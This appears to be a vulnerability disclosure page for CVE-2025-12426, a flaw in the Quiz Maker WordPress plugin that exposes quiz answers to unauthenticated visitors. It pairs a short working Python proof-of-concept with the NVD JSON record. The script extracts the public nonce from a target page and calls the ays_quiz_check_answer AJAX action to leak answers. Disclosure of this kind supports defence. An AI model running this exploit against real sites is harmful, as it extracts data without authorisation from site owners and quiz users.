CVE-2025-12426

import requests import re target_url = "https://vulnerable-site.com" # Step 1: Get the public nonce from the page response = requests.get(target_url) # Extract nonce from: var quiz_maker_ajax_public = {"ajax_url":"...","nonce":"<NONCE>"} nonce_match = re.search(r'quiz_maker_ajax_public.*?"nonce":"([a-zA-Z0-9]+)"', response.text) if not nonce_match: print("Failed to extract nonce") exit(1) nonce = nonce_match.group(1) print(f"Extracted nonce: {nonce}") # Step 2: Extract quiz and question IDs from the page # Quiz IDs are typically in data attributes like: data-quiz-id="123" # Question IDs are in form fields like: name="ays_questions[]" value="456" quiz_id = "1" # Replace with target quiz ID question_id = "1" # Replace with target question ID # Step 3: Send request to leak answer ajax_url = re.search(r'"ajax_url":"([^"]+)"', response.text).group(1) data = { "action": "ays_quiz_check_answer", "nonce": nonce, "quiz_id": quiz_id, "question_id": question_id } result = requests.post(ajax_url, data=data) print(f"Answer leaked: {result.text}")

{"cve": {"id": "CVE-2025-12426", "sourceIdentifier": "[email protected]", "published": "2025-11-19T05:16:02.477", "lastModified": "2025-12-12T16:13:30.407", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Quiz Maker plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 6.7.0.80. This is due to the plugin exposing quiz answers through the ays_quiz_check_answer AJAX action without proper authorization checks. The endpoint only validates a nonce, but that same nonce is publicly available to all site visitors via the quiz_maker_ajax_public localized script data. This makes it possible for unauthenticated attackers to extract sensitive data including quiz answers for any quiz question."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-200"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "NVD-CWE-noinfo"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:ays-pro:quiz_maker:*:*:*:*:*:wordpress:*:*", "versionEndExcluding": "6.7.0.81", "matchCriteriaId": "C4BE7F00-6234-4268-908E-D13A380F8E54"}]}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/quiz-maker/tags/6.7.0.69/includes/class-quiz-maker.php#L393", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://plugins.trac.wordpress.org/browser/quiz-maker/tags/6.7.0.69/public/class-quiz-maker-public.php#L179", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://plugins.trac.wordpress.org/browser/quiz-maker/tags/6.7.0.69/public/class-quiz-maker-public.php#L8490", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/bc524e3e-9b7c-47ae-ab44-c327b287b81a?source=cve", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}